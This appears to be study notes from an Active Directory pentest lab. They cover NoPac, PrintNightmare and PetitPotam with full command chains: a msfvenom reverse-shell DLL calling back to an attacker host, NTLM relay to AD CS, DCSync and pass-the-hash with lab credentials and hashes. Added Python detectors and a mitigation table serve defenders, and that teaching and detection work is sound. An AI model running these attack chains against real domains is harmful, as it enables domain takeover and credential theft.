
Bleeding Edge Vulnerabilities

Three high-impact AD attack vectors that can lead to domain compromise from a standard domain user (or even from an unauthenticated position). They are useful when patch management is slow but carry real risk: understand the impact before using them in production environments.

NoPac (SamAccountName Spoofing)

CVEs: CVE-2021-42278 + CVE-2021-42287

Allows intra-domain privilege escalation from any standard domain user to Domain Admin via a single command.

How It Works

  1. Authenticated users can add up to 10 computer accounts to a domain (controlled by ms-DS-MachineAccountQuota)
  2. Create a new machine account and rename its SamAccountName to match a Domain Controller’s name
  3. Request a Kerberos TGT — the KDC issues a ticket under the DC’s name
  4. Request a TGS — the service issues a ticket for the closest matching name (the real DC)
  5. Result: SYSTEM shell on the Domain Controller

If ms-DS-MachineAccountQuota is set to 0, this attack fails.

Scanning

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Check the ms-DS-MachineAccountQuota value and whether a TGT can be obtained.

Getting a Shell

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Uses smbexec.py under the hood — may be blocked by AV/EDR. Use exact paths instead of cd in the semi-interactive shell.

DCSync via NoPac

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

The TGT is saved as a .ccache file that can be used for pass-the-ticket attacks.

Windows Defender Considerations

smbexec.py creates services (BTOBTO, BTOBO) and batch files (execute.bat) that Defender flags as VirTool:Win32/MSPSEexecCommand. Individual commands may fail even though the shell session is established.
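The NoPac chain above leaves host-side artifacts at each step: a computer account created by a regular user (Security event 4741), the sAMAccountName rename that drops the trailing `$` or collides with a DC name (4742, "SAM Account Name" field), and the smbexec.py service install (System event 7045 with the BTOBTO/BTOBO names or an execute.bat helper). The following is an added detection example, not code from the page or from any of the tools it names; the event records are constructed dicts mirroring those log fields, and KNOWN_DCS is an assumed inventory of real DC names.

```python
"""Added example: flag the NoPac artifacts in constructed Windows event records.
Not from the original page; KNOWN_DCS and the sample events are assumptions."""
from dataclasses import dataclass

# Assumed inventory of legitimate Domain Controller names (no trailing '$').
KNOWN_DCS = {"ACADEMY-EA-DC01"}

# Service names and batch file name that smbexec.py leaves behind (from the page).
SMBEXEC_SERVICE_NAMES = {"BTOBTO", "BTOBO"}
SMBEXEC_BATCH_FILE = "execute.bat"


@dataclass
class Finding:
    rule: str
    event_id: int
    detail: str


def check_machine_account_events(events):
    """Security log checks for the account-creation and rename steps.

    4741 (computer account created): every creation by a regular user counts,
    because with ms-DS-MachineAccountQuota > 0 that is the attacker's entry point.
    4742 (computer account changed): the 'SAM Account Name' field carries the new
    value ('-' means unchanged). A rename that drops the trailing '$' or that
    collides with a real DC name is the NoPac signature.
    """
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4741:
            findings.append(Finding("machine-account-created", eid,
                f"{ev['SubjectUserName']} created {ev['TargetUserName']}"))
        elif eid == 4742:
            new_sam = ev.get("SamAccountName", "-")
            if new_sam == "-":
                continue  # attribute not changed in this event
            target = ev["TargetUserName"]
            if not new_sam.endswith("$"):
                findings.append(Finding("samaccountname-dollar-dropped", eid,
                    f"{target} renamed to {new_sam}"))
            if new_sam.rstrip("$").upper() in KNOWN_DCS:
                findings.append(Finding("samaccountname-dc-collision", eid,
                    f"{target} renamed to DC name {new_sam}"))
    return findings


def check_service_install_events(events):
    """System log 7045 (service installed): match the smbexec.py service names or
    a service binary path that runs the execute.bat helper."""
    findings = []
    for ev in events:
        if ev["EventID"] != 7045:
            continue
        name = ev["ServiceName"]
        path = ev["ImagePath"].lower()
        if name in SMBEXEC_SERVICE_NAMES or SMBEXEC_BATCH_FILE in path:
            findings.append(Finding("smbexec-service-install", 7045,
                f"service {name!r} runs {ev['ImagePath']}"))
    return findings


def analyze(events):
    return check_machine_account_events(events) + check_service_install_events(events)


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "forend", "TargetUserName": "WIN-ATTK01$"},
    {"EventID": 4742, "TargetUserName": "WIN-ATTK01$", "SamAccountName": "ACADEMY-EA-DC01"},
    {"EventID": 4742, "TargetUserName": "FILE01$", "SamAccountName": "-"},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c %TEMP%\execute.bat"},
    {"EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.rule}: {f.detail}")
```

Setting ms-DS-MachineAccountQuota to 0 removes the first step entirely; the 4742 rule is the one worth keeping even then, since a rename to a DC name has no legitimate use.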

PrintNightmare

CVEs: CVE-2021-34527 + CVE-2021-1675

Remote code execution via the Print Spooler service, which runs by default on all Windows OS versions.

Prerequisites

  • cube0x0’s version of Impacket (different from standard Impacket)
  • Print System Asynchronous Protocol (MS-PAR) and Print System Remote Protocol (MS-RPRN) exposed on target

Enumerate Print Spooler Exposure

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

Attack Flow

1. Generate DLL payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

2. Host payload on SMB share

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

3. Start Metasploit handler

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.5.225
set LPORT 8080
run

4. Run the exploit

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

Result: Meterpreter session as NT AUTHORITY\SYSTEM on the Domain Controller.

Warning: This attack could crash the Print Spooler service and cause a service disruption.
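Two defender-side checks for the material above, written as an added example rather than code from the page or from any tool it names: an inventory function that parses rpcdump.py-style output for the MS-RPRN/MS-PAR entries the egrep looks for, and a Sysmon Event ID 11 (FileCreate) rule that flags spoolsv.exe writing a non-approved DLL into the spool drivers directory, which is where a driver supplied through the exploit lands before it is loaded. The rpcdump text, the Sysmon records and the APPROVED_DRIVER_DLLS allowlist are constructed for illustration.

```python
"""Added example: Print Spooler exposure inventory and driver-drop detection.
Not from the original page; sample data and allowlist are constructed."""
import re

# Spooler RPC protocols that rpcdump.py labels by their MS- short name.
SPOOLER_PROTOCOLS = {"MS-RPRN", "MS-PAR"}

# Where spoolsv.exe stores printer driver files.
SPOOL_DRIVERS_DIR = "\\spool\\drivers\\"
SPOOLER_IMAGE = "\\spoolsv.exe"

# Assumed allowlist of driver DLL file names approved in this environment.
APPROVED_DRIVER_DLLS = {"unidrv.dll", "unidrvui.dll"}

_PROTO_RE = re.compile(r"^Protocol:\s*\[(MS-[A-Z0-9]+)\]", re.MULTILINE)


def exposed_spooler_protocols(rpcdump_output: str) -> set:
    """Return which spooler protocols the rpcdump.py output reports.
    Structured equivalent of the egrep on the page."""
    found = {m.group(1) for m in _PROTO_RE.finditer(rpcdump_output)}
    return found & SPOOLER_PROTOCOLS


def suspicious_driver_drops(sysmon_events):
    """Sysmon Event ID 11: spoolsv.exe creating a DLL under the spool drivers
    directory whose file name is not an approved driver. Legitimate driver
    installs hit the same path, so the allowlist is what keeps noise down."""
    hits = []
    for ev in sysmon_events:
        if ev["EventID"] != 11:
            continue
        image = ev["Image"].lower()
        target = ev["TargetFilename"].lower()
        if not image.endswith(SPOOLER_IMAGE):
            continue
        if SPOOL_DRIVERS_DIR not in target or not target.endswith(".dll"):
            continue
        if target.rsplit("\\", 1)[-1] in APPROVED_DRIVER_DLLS:
            continue
        hits.append(ev["TargetFilename"])
    return hits


# Constructed rpcdump.py-style output (not a real capture).
SAMPLE_RPCDUMP = """\
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
"""

# Constructed Sysmon FileCreate records (not real telemetry).
SAMPLE_SYSMON = [
    {"EventID": 11, "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\New\backupscript.dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\unidrv.dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetFilename": r"C:\Windows\System32\spool\PRINTERS\00012.SPL"},
    {"EventID": 1, "Image": r"C:\Windows\System32\spoolsv.exe", "TargetFilename": ""},
]

if __name__ == "__main__":
    print("spooler protocols exposed:", sorted(exposed_spooler_protocols(SAMPLE_RPCDUMP)))
    for path in suspicious_driver_drops(SAMPLE_SYSMON):
        print("suspicious driver drop:", path)
```

If the inventory function returns a non-empty set on a host that does not need to serve printing (a Domain Controller in particular), stopping and disabling the Spooler service removes the exposure outright.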

PetitPotam (MS-EFSRPC)

CVE: CVE-2021-36942

LSA spoofing vulnerability that coerces a Domain Controller to authenticate to an attacker-controlled host via NTLM. Combined with AD CS (Active Directory Certificate Services) NTLM relay, this achieves domain compromise from an unauthenticated position.

Attack Flow

  1. ntlmrelayx.py relays the DC’s authentication to the CA’s Web Enrollment page
  2. PetitPotam.py coerces the DC to authenticate to the attacker
  3. A certificate is obtained for the DC’s machine account
  4. The certificate is used to request a TGT via PKINIT
  5. The TGT is used for DCSync

Step 1: Start NTLM relay targeting AD CS

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

Step 2: Coerce DC authentication

python3 PetitPotam.py 172.16.5.225 172.16.5.5

Alternative triggers: Mimikatz (misc::efs /server:<DC> /connect:<ATTACK_HOST>), Invoke-PetitPotam.ps1, or an executable version.

Step 3: Request TGT using the certificate

python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQI...SNIP...CKBdGmY= dc01.ccache

Save the AS-REP encryption key from the output — needed for the alternate path.

Step 4: DCSync with the TGT

export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Alternate Path: Get NT Hash via U2U

python3 /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

Then DCSync with the recovered hash:

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

Windows Path: Rubeus Pass-the-Ticket

Use the base64 certificate from ntlmrelayx.py with Rubeus:

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQI...SNIP... /ptt

Then DCSync with Mimikatz:

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

PetitPotam Mitigations

| Control | Details |
|---|---|
| Patch CVE-2021-36942 | Apply to all affected hosts (not sufficient alone if AD CS is present) |
| Extended Protection for Authentication | Enable on CA Web Enrollment with Require SSL |
| Disable NTLM on DCs | Prevents NTLM relay entirely |
| Disable NTLM on AD CS servers | Via Group Policy |
| Disable NTLM for IIS on AD CS | On servers running Web Enrollment / Certificate Enrollment Web Service |

Important: Patching alone is not enough. Authenticated attacks against AD CS are still possible with standard domain user credentials. See the “Certified Pre-Owned” whitepaper for comprehensive AD CS hardening.
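The mitigations above reduce the relay surface; on the detection side, step 4 of the chain (a TGT for the DC's machine account requested with a certificate via PKINIT) is visible in Security event 4768, whose "Certificate Information" fields are populated only for certificate-based pre-authentication. The following is an added example, not code from the page or any tool it names: it flags 4768 records where a known DC's machine account obtains a TGT with a certificate from a client address that is not that DC's own. The event records and the KNOWN_DCS inventory are constructed.

```python
"""Added example: flag certificate-based TGT requests for a DC machine account
from a non-DC address (PetitPotam + AD CS relay, step 4). Not from the original
page; KNOWN_DCS and the sample 4768 records are assumptions."""
from dataclasses import dataclass

# Assumed inventory: DC machine account name (without '$') -> its IP addresses.
KNOWN_DCS = {"ACADEMY-EA-DC01": {"172.16.5.5"}}


@dataclass
class Finding:
    account: str
    client_ip: str
    cert_thumbprint: str


def _strip_ipv4_mapped(addr: str) -> str:
    """4768 logs IPv4 clients as '::ffff:a.b.c.d'; normalise to 'a.b.c.d'."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def dc_pkinit_from_foreign_host(events):
    """Flag 4768 (Kerberos TGT requested) where the target is a known DC's machine
    account, a Certificate Thumbprint is present (certificate pre-auth), and the
    client address is not one of that DC's own addresses."""
    findings = []
    for ev in events:
        if ev["EventID"] != 4768:
            continue
        account = ev["TargetUserName"]
        if not account.endswith("$"):
            continue
        dc_name = account[:-1].upper()
        if dc_name not in KNOWN_DCS:
            continue
        thumb = ev.get("CertThumbprint", "")
        if not thumb:
            continue  # password-based pre-auth, not the PKINIT path
        ip = _strip_ipv4_mapped(ev["IpAddress"])
        if ip in KNOWN_DCS[dc_name]:
            continue
        findings.append(Finding(account, ip, thumb))
    return findings


# Constructed 4768 records (not real log data).
SAMPLE_EVENTS = [
    # DC machine account, certificate pre-auth, from a non-DC address: flagged.
    {"EventID": 4768, "TargetUserName": "ACADEMY-EA-DC01$",
     "IpAddress": "::ffff:172.16.5.225", "CertThumbprint": "CONSTRUCTED-THUMBPRINT-01"},
    # Same account from its own address, no certificate: normal operation.
    {"EventID": 4768, "TargetUserName": "ACADEMY-EA-DC01$",
     "IpAddress": "::ffff:172.16.5.5", "CertThumbprint": ""},
    # Regular user, no certificate: ignored.
    {"EventID": 4768, "TargetUserName": "forend",
     "IpAddress": "::ffff:172.16.5.50", "CertThumbprint": ""},
    # Certificate pre-auth from the DC's own address: not flagged by this rule.
    {"EventID": 4768, "TargetUserName": "ACADEMY-EA-DC01$",
     "IpAddress": "::ffff:172.16.5.5", "CertThumbprint": "CONSTRUCTED-THUMBPRINT-02"},
]

if __name__ == "__main__":
    for f in dc_pkinit_from_foreign_host(SAMPLE_EVENTS):
        print(f"PKINIT TGT for {f.account} from {f.client_ip} (cert {f.cert_thumbprint})")
```

A hit here should be correlated with the CA's own issuance events for the DomainController template and with the DC's SMB authentication to the relay host; on its own it already identifies the client address that holds the DC's certificate.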

Summary Comparison

| Attack | Auth Required | Access Level | Risk |
|---|---|---|---|
| NoPac | Standard domain user | SYSTEM on DC | Moderate (creates machine account) |
| PrintNightmare | Standard domain user | SYSTEM on DC | Higher (may crash Print Spooler) |
| PetitPotam | None (unauthenticated) | SYSTEM on DC (via AD CS relay) | Moderate (requires AD CS) |